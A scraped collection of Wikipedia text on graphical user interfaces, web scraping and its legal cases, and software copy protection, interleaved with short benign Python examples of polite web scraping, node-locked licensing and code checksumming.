commercial was to make people think about computers, identifying the user-friendly interface as a personal computer which departed from prior business-oriented systems, 29 and becoming a signature representation of Apple products. 
30 In 1985, Commodore released the Amiga 1000, along with Workbench and Kickstart 1.0 (which contained Intuition). This interface ran as a separate task, meaning it was very responsive and, unlike other GUIs of the time, it didn't freeze up when a program was busy. Additionally, it was the first GUI to introduce something resembling Virtual Desktops. Windows 95, accompanied by an extensive marketing campaign, 31 was a major success in the marketplace at launch and shortly became the most popular desktop operating system. 32 In 2007, with the iPhone 33 and later in 2010 with the introduction of the iPad, 34 Apple popularized the post-WIMP style of interaction for multi-touch screens, and those devices were considered to be milestones in the development of mobile devices. 35 36 The GUIs familiar to most people as of the mid-late 2010s are Microsoft Windows, macOS, and the X Window System interfaces for desktop and laptop computers, and Android, Apple's iOS, Symbian, BlackBerry OS, Windows Phone Windows 10 Mobile, Tizen, WebOS, and Firefox OS for handheld (smartphone) devices. 37 38 Since the commands available in command line interfaces can be many, complex operations can be performed using a short sequence of words and symbols. Custom functions may be used to facilitate access to frequent actions. Command-line interfaces are more lightweight, as they only recall information necessary for a task; for example, no preview thumbnails or graphical rendering of web pages. This allows greater efficiency and productivity once many commands are learned. 3 But reaching this level takes some time because the command words may not be easily discoverable or mnemonic. Also, using the command line can become slow and error-prone when users must enter long commands comprising many parameters or several different filenames at once. However, windows, icons, menus, pointer (WIMP) interfaces present users with many widgets that represent and can trigger some of the system's available commands. GUIs can be made quite hard when dialogs are buried deep in a system or moved about to different places during redesigns. Also, icons and dialog boxes are usually harder for users to script. WIMPs extensively use modes, as the meaning of all keys and clicks on specific positions on the screen are redefined all the time. Command-line interfaces use modes only in limited forms, such as for current directory and environment variables. Most modern operating systems provide both a GUI and some level of a CLI, although the GUIs usually receive more attention. GUI wrappers find a way around the command-line interface versions (CLI) of (typically) Linux and Unix-like software applications and their text-based UIs or typed command labels. While command-line or text-based applications allow users to run a program non-interactively, GUI wrappers atop them avoid the steep learning curve of the command-line, which requires commands to be typed on the keyboard. By starting a GUI wrapper, users can intuitively interact with, start, stop, and change its working parameters, through graphical icons and visual indicators of a desktop environment, for example. Applications may also provide both interfaces, and when they do the GUI is usually a WIMP wrapper around the command-line version. This is especially common with applications designed for Unix-like operating systems. 
The latter used to be implemented first because it allowed the developers to focus exclusively on their product's functionality without bothering about interface details such as designing icons and placing buttons. Designing programs this way also allows users to run the program in a shell script. Many environments and games use the methods of 3D graphics to project 3D GUI objects onto the screen. The use of 3D graphics has become increasingly common in mainstream operating systems (ex. Windows Aero, and Aqua (MacOS)) to create attractive interfaces, termed eye candy (which includes, for example, the use of drop shadows underneath windows and the cursor), or for functional purposes only possible using three dimensions. For example, user switching is represented by rotating a cube with faces representing each user's workspace, and window management is represented via a Rolodex-style flipping mechanism in Windows Vista (see Windows Flip 3D). In both cases, the operating system transforms windows on-the-fly while continuing to update the content of those windows. The GUI is usually WIMP-based, although occasionally other metaphors surface, such as those used in Microsoft Bob, 3dwm, File System Navigator, File System Visualizer, 3D Mailbox, 39 40 and GopherVR. Zooming (ZUI) is a related technology that promises to deliver the representation benefits of 3D environments without their usability drawbacks of orientation problems and hidden objects. In 2006, Hillcrest Labs introduced the first ZUI for television. 41 Other innovations include the menus on the PlayStation 2, the menus on the Xbox, Sun's Project Looking Glass, Metisse, which was similar to Project Looking Glass, 42 BumpTop, where users can manipulate documents and windows with realistic movement and physics as if they were physical documents, Croquet OS, which is built for collaboration, 43 and compositing window managers such as Enlightenment and Compiz. Augmented reality and virtual reality also make use of 3D GUI elements. 44 3D GUIs have appeared in science fiction literature and films, even before certain technologies were feasible or in common use. 45 |
218 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Methods_to_prevent_web_scraping | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
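The fetch-then-extract cycle described in the scraped passage above maps directly onto the libraries this notebook already installs. The following is a minimal sketch, not the article's own method: the URL is a placeholder and the choice of tags extracted is illustrative.

import requests
from bs4 import BeautifulSoup

def fetch_and_extract(url):
    # Fetch: download the raw HTML of the page (what a browser does when a user views it)
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Extract: parse the HTML and pull out the pieces of interest
    soup = BeautifulSoup(response.text, "html5lib")
    title = soup.title.string if soup.title else None
    paragraphs = [p.get_text(strip=True) for p in soup.find_all("p")]
    return title, paragraphs

# Example usage (placeholder URL):
# title, paragraphs = fetch_and_extract("https://en.wikipedia.org/wiki/Web_scraping")
# print(title, len(paragraphs))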
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
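The regular-expression and DOM/XPath techniques mentioned at the start of this passage can be sketched briefly in Python. This is an illustrative example only: the HTML snippet is made up, and the XPath variant assumes the third-party lxml package, which is not installed earlier in this notebook.

import re

# Regular-expression matching: pull every href value out of raw HTML
# without building a DOM tree (the snippet below is a placeholder).
html = '<a href="https://example.com/a">A</a> <a href="https://example.com/b">B</a>'
links = re.findall(r'href="([^"]+)"', html)
print(links)  # ['https://example.com/a', 'https://example.com/b']

# The same page could instead be parsed into a DOM tree and queried with XPath,
# e.g. using the lxml package (an assumption; install it separately):
# from lxml import html as lhtml
# links = lhtml.fromstring(html).xpath('//a/@href')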
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
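Of the tools listed above, Scrapy needs the most scaffolding, so a minimal spider sketch may help; it targets quotes.toscrape.com, the public practice site used in Scrapy's own tutorial, and the CSS selectors assume that site's markup rather than anything from the scraped article.
import scrapy

class QuotesSpider(scrapy.Spider):
    """Minimal spider: crawl the practice site and yield one item per quote."""
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow pagination until there is no "next" link left.
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)
Saved as quotes_spider.py, the spider can be run with: scrapy runspider quotes_spider.py -o quotes.json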
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
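Row 218 closes by noting that administrators use various measures to stop or slow bots. From the scraper's side, a common way to avoid triggering those defences is to honour robots.txt and throttle requests; the sketch below uses only the standard library plus requests, and the user-agent string is a made-up placeholder.
import time
from urllib.parse import urljoin, urlparse
from urllib.robotparser import RobotFileParser
import requests

USER_AGENT = "example-research-bot/0.1"  # placeholder identifier

def polite_get(url, delay=2.0):
    """Fetch url only if robots.txt allows it, then pause before returning."""
    parts = urlparse(url)
    rp = RobotFileParser()
    rp.set_url(urljoin(f"{parts.scheme}://{parts.netloc}", "/robots.txt"))
    rp.read()
    if not rp.can_fetch(USER_AGENT, url):
        print(f"robots.txt disallows fetching {url}")
        return None
    response = requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)
    time.sleep(delay)  # crude rate limiting between successive requests
    return response.text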
219 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Copy_protection | Copy protection, also known as content protection, copy prevention and copy restriction, is any measure to enforce copyright by preventing the reproduction of software, films, music, and other media. 1 Copy protection is most commonly found on videotapes, DVDs, Blu-ray discs, HD-DVDs, computer software discs, video game discs and cartridges, audio CDs and some VCDs. It also may be incorporated into digitally distributed versions of media and software. Some methods of copy protection have also led to criticism because it caused inconvenience for paying consumers or secretly installed additional or unwanted software to detect copying activities on the consumer's computer. Making copy protection effective while protecting consumer rights remains a problem with media publication. Media corporations have always used the term copy protection, but critics argue that the term tends to sway the public into identifying with the publishers, who favor restriction technologies, rather than with the users. 2 Copy prevention and copy control may be more neutral terms. "Copy protection" is a misnomer for some systems, because any number of copies can be made from an original and all of these copies will work, but only in one computer, or only with one dongle, or only with another device that cannot be easily copied. The term is also often related to, and confused with, the concept of digital restrictions management. Digital restrictions management is a more general term because it includes all sorts of management of works, including copy restrictions. Copy restriction may include measures that are not digital. A more appropriate term may be "technological protection measures" (TPMs), 3 which is often defined as the use of technological tools in order to restrict the use or access to a work. Unauthorized copying and distribution accounted for $2.4 billion per year in lost revenue in the United States alone in 1990, 4 and is assumed to be causing impact on revenues in the music and the video game industry, leading to proposal of stricter copyright laws such as PIPA. Copy protection is most commonly found on videotapes, DVDs, computer software discs, video game discs and cartridges, audio CDs and some VCDs. Many media formats are easy to copy using a machine, allowing consumers to distribute copies to their friends, a practice known as "casual copying". Companies publish works under copyright protection because they believe that the cost of implementing the copy protection will be less than the revenue produced by consumers who buy the product instead of acquiring it through casually copied media. Opponents of copy protection argue that people who obtain free copies only use what they can get for free and would not purchase their own copy if they were unable to obtain a free copy. Some even argue that free copies increase profit; people who receive a free copy of a music CD may then go and buy more of that band's music, which they would not have done otherwise. Some publishers have avoided copy-protecting their products on the theory that the resulting inconvenience to their users outweighs any benefit of frustrating "casual copying". From the perspective of the end user, copy protection is always a cost. DRM and license managers sometimes fail, are inconvenient to use, and may not afford the user all of the legal use of the product they have purchased. 
The term copy protection refers to the technology used to attempt to frustrate copying, and not to the legal remedies available to publishers or authors whose copyrights are violated. Software usage models range from node locking to floating licenses (where a fixed number licenses can be concurrently used across an enterprise), grid computing (where multiple computers function as one unit and so use a common license) and electronic licensing (where features can be purchased and activated online). The term license management refers to broad platforms which enable the specification, enforcement and tracking of software licenses. To safeguard copy protection and license management technologies themselves against tampering and hacking, software anti-tamper methods are used. Floating licenses are also being referred to as Indirect Licenses, and are licenses that at the time they are issued, there is no actual user who will use them. That has some technical influence over some of their characteristics. Direct Licenses are issued after a certain user requires it. As an example, an activated Microsoft product, contains a Direct License which is locked to the PC where the product is installed. From business standpoint, on the other hand, some services now try to monetize on additional services other than the media content so users can have better experience than simply obtaining the copied product. 5 From a technical standpoint, it seems impossible to completely prevent users from making copies of the media they purchase, as long as a "writer" is available that can write to blank media. All types of media require a "player"—a CD player, DVD player, videotape player, computer or video game console—which must be able to read the media in order to display it to a human. Logically, a player could be built that reads the media and then writes an exact copy of what was read to the same type of media. citation needed At a minimum, digital copy protection of non-interactive works is subject to the analog hole: regardless of any digital restrictions, if music can be heard by the human ear, it can also be recorded (at the very least, with a microphone and tape recorder); if a film can be viewed by the human eye, it can also be recorded (at the very least, with a video camera and recorder). In practice, almost-perfect copies can typically be made by tapping into the analog output of a player (e.g. the speaker output or headphone jacks) and, once redigitized into an unprotected form, duplicated indefinitely. Copying text-based content in this way is more tedious, but the same principle applies: if it can be printed or displayed, it can also be scanned and OCRed. With basic software and some patience, these techniques can be applied by a typical computer-literate user. citation needed Since these basic technical facts exist, it follows that a determined individual will definitely succeed in copying any media, given enough time and resources. Media publishers understand this; copy protection is not intended to stop professional operations involved in the unauthorized mass duplication of media, but rather to stop "casual copying". citation needed Copying of information goods which are downloaded (rather than being mass-duplicated as with physical media) can be inexpensively customized for each download, and thus restricted more effectively, in a process known as "traitor tracing". They can be encrypted in a fashion which is unique for each user's computer, and the decryption system can be made tamper-resistant. 
citation needed Copyright protection in content platforms also cause increased market concentration and a loss in aggregate welfare. According to research on the European Directive on copyright in the Digital Single Market on platform competition, only users of large platforms will be allowed to upload content if the content is sufficiently valuable and network effects are strong. 6 For information on individual protection schemes and technologies, see List of copy protection schemes or relevant category page. Copy protection for computer software, especially for games, has been a long cat-and-mouse struggle between publishers and crackers. These were (and are) programmers who defeated copy protection on software as a hobby, add their alias to the title screen, and then distribute the "cracked" product to the network of warez BBSes or Internet sites that specialized in distributing unauthorized copies of software. When computer software was still distributed in audio cassettes, audio copying was unreliable, while digital copying was time consuming. Software prices were comparable with audio cassette prices. 4 7 To make digital copying more difficult, many programs used non-standard loading methods (loaders incompatible with standard BASIC loaders, or loaders that used different transfer speed). Unauthorized software copying began to be a problem when floppy disks became the common storage media. 7 The ease of copying depended on the system; Jerry Pournelle wrote in BYTE in 1983 that "CP M doesn't lend itself to copy protection" so its users "haven't been too worried" about it, while "Apple users, though, have always had the problem. So have those who used TRS-DOS, and I understand that MS-DOS has copy protection features". 8 Pournelle disliked copy protection 9 and, except for games, refused to review software that used it. He did not believe that it was useful, writing in 1983 that "For every copy protection scheme there's a hacker ready to defeat it. Most involve so-called nibble nybble copiers, which try to analyze the original disk and then make a copy". 8 IBM's Don Estridge agreed: "I guarantee that whatever scheme you come up with will take less time to break than to think of it. While calling piracy "a threat to software development. It's going to dry up the software", he said "It's wrong to copy-protect programs ... There ought to be some way to stop piracy without creating products that are unusable. 10 Copy protection sometimes caused software not to run on clones, such as the Apple II-compatible Laser 128, 11 or even the genuine Commodore 64 with certain peripherals. 12 In 1989 Gilman Louie, head of Spectrum Holobyte, stated that copy protection added about $0.50 per copy to the cost of production of a game. 13 Other software relied on complexity; Antic in 1988 observed that WordPerfect for the Atari ST "is almost unusable without its manual of over 600 pages . 14 (The magazine was mistaken; the ST version was so widely pirated that the company threatened to discontinue it. 15 16 ) To limit reusing activation keys to install the software on multiple machines, it has been attempted to tie the installed software to a specific machine by involving some unique feature of the machine. Serial number in ROM could not be used because some machines do not have them. Some popular surrogate for a machine serial number were date and time (to the second) of initialization of the hard disk or MAC address of Ethernet cards (although this is programmable on modern cards). 
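The passage above mentions tying an installation to hardware surrogates such as the Ethernet MAC address. The toy sketch below illustrates that node-locking idea with the standard library only; machine_fingerprint and license_is_valid are invented names for illustration, not any real licensing API.
import hashlib
import uuid

def machine_fingerprint():
    """Hash the MAC address reported by uuid.getnode() into a stable identifier.

    On some systems getnode() falls back to a random value, which mirrors the
    weaknesses (spoofable, unstable identifiers) the article describes.
    """
    return hashlib.sha256(str(uuid.getnode()).encode()).hexdigest()

def license_is_valid(stored_fingerprint):
    # A node-locked license records the fingerprint at activation time and
    # refuses to run when the current machine no longer matches it.
    return machine_fingerprint() == stored_fingerprint

print(machine_fingerprint())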
With the rise of virtualization, however, the practice of locking has to add to these simple hardware parameters to still prevent copying. 17 During the 1980s and 1990s, video games sold on audio cassette and floppy disks were sometimes protected with an external user-interactive method that demanded the user to have the original package or a part of it, usually the manual. Copy protection was activated not only at installation, but every time the game was executed. 18 19 Several imaginative and creative methods have been employed, in order to be both fun and hard to copy. These include: 20 All of these methods proved to be troublesome and tiring for the players, and as such greatly declined in usage by the mid 1990s, at which point the emergence of CDs as the primary video game medium made copy protection largely redundant, since CD copying technology was not widely available at the time. 18 Some game developers, such as Markus Persson, 24 have encouraged consumers and other developers to embrace the reality of unlicensed copying and utilize it positively to generate increased sales and marketing interest. Starting in 1985 with the video release of The Cotton Club (Beta and VHS versions only), Macrovision licensed to publishers a technology that exploits the automatic gain control feature of VCRs by adding pulses to the vertical blanking sync signal. 25 These pulses may negatively affect picture quality, but succeed in confusing the recording-level circuitry of many consumer VCRs. This technology, which is aided by U.S. legislation mandating the presence of automatic gain-control circuitry in VCRs, is said to "plug the analog hole" and make VCR-to-VCR copies impossible, although an inexpensive circuit is widely available that will defeat the protection by removing the pulses. Macrovision had patented methods of defeating copy prevention, 26 giving it a more straightforward basis to shut down manufacture of any device that descrambles it than often exists in the DRM world. While used for pre-recorded tapes, the system was not adopted for television broadcasts; Michael J. Fuchs of HBO said in 1985 that Macrovision was "not good technology" because it reduced picture quality and consumers could easily bypass it, while Peter Chernin of Showtime said "we want to accommodate our subscribers and we know they like to tape our movies". 27 Over time, software publishers (especially in the case of video games) became creative about crippling the software in case it was duplicated. These games would initially show that the copy was successful, but eventually render themselves unplayable via subtle methods. Many games use the "code checksumming" technique to prevent alteration of code to bypass other copy protection. Important constants for the game - such as the accuracy of the player's firing, the speed of their movement, etc. - are not included in the game but calculated from the numbers making up the machine code of other parts of the game. If the code is changed, the calculation yields a result which no longer matches the original design of the game and the game plays improperly. Copying commercial games, such as this one, is a criminal offense and copyright infringement. Copying and re-supplying games such as this one can lead to a term of imprisonment. Think of a pirated game as stolen property. This game is protected by the FADE system. You can play with a pirated game- but not for long. The quality of a pirated game will degrade over time. Purchase only genuine software at legitimate stores. 
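The "code checksumming" idea described above, deriving gameplay constants from the program's own bytes so that tampering quietly breaks the game, can be sketched in a few lines; game_logic, EXPECTED_CHECKSUM, and move_speed are invented names, and a real scheme would checksum shipped machine code at build time rather than Python bytecode at run time.
import zlib

def game_logic(player_x, speed):
    # Stand-in for real game code whose integrity the constants are tied to.
    return player_x + speed

# Checksum of the untampered code, baked in by the build process.
EXPECTED_CHECKSUM = zlib.crc32(game_logic.__code__.co_code)

def move_speed():
    """Derive a movement constant from a checksum of the game's own code.

    If game_logic is patched (say, to skip a copy check), the ratio drifts
    away from 1.0 and movement quietly misbehaves.
    """
    return zlib.crc32(game_logic.__code__.co_code) / EXPECTED_CHECKSUM

print(move_speed())  # 1.0 while the code is unmodified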
The usage of copy protection payloads which lower playability of a game without making it clear that this is a result of copy protection is now generally considered unwise, due to the potential for it to result in unaware players with unlicensed copies spreading word-of-mouth that a game is of low quality. The authors of FADE explicitly acknowledged this as a reason for including the explicit warning message. Anti-piracy measures are efforts to fight against copyright infringement, counterfeiting, and other violations of intellectual property laws. It includes, but is by no means limited to, the combined efforts of corporate associations (such as the RIAA and MPAA), law enforcement agencies (such as the FBI and Interpol), and various international governments clarification needed to combat copyright infringement relating to various types of creative works, such as software, music and films. These measures often come in the form of copy protection measures such as DRM, or measures implemented through a content protection network, such as Distil Networks or Incapsula. Richard Stallman and the GNU Project have criticized the use of the word "piracy" in these situations, saying that publishers use the word to refer to "copying they don't approve of" and that "they publishers imply that it is ethically equivalent to attacking ships on the high seas, kidnapping and murdering the people on them". 38 Certain forms of anti-piracy (such as DRM) are considered by consumers to control the use of the products content after sale. In the case MPAA v. Hotfile, Judge Kathleen M. Williams granted a motion to deny the prosecution the usage of words she views as "pejorative". This list included the word "piracy", the use of which, the motion by the defense stated, would serve no purpose but to misguide and inflame the jury. The plaintiff argued the common use of the terms when referring to copyright infringement should invalidate the motion, but the Judge did not concur. 39 Today copyright infringement is often facilitated by the use of file sharing. In fact, infringement accounts for 23.8% of all internet traffic in 2013. 40 In an effort to cut down on this, both large and small films and music corporations have issued DMCA takedown notices, filed lawsuits, and pressed criminal prosecution of those who host these file sharing services. 41 42 43 44 The EURion constellation is used by many countries to prevent color photocopiers from producing counterfeit currency. The Counterfeit Deterrence System is used to prevent counterfeit bills from being produced by image editing software. 45 Similar technology has been proposed 46 to prevent 3D printing of firearms, for reasons of gun control rather than copyright. |
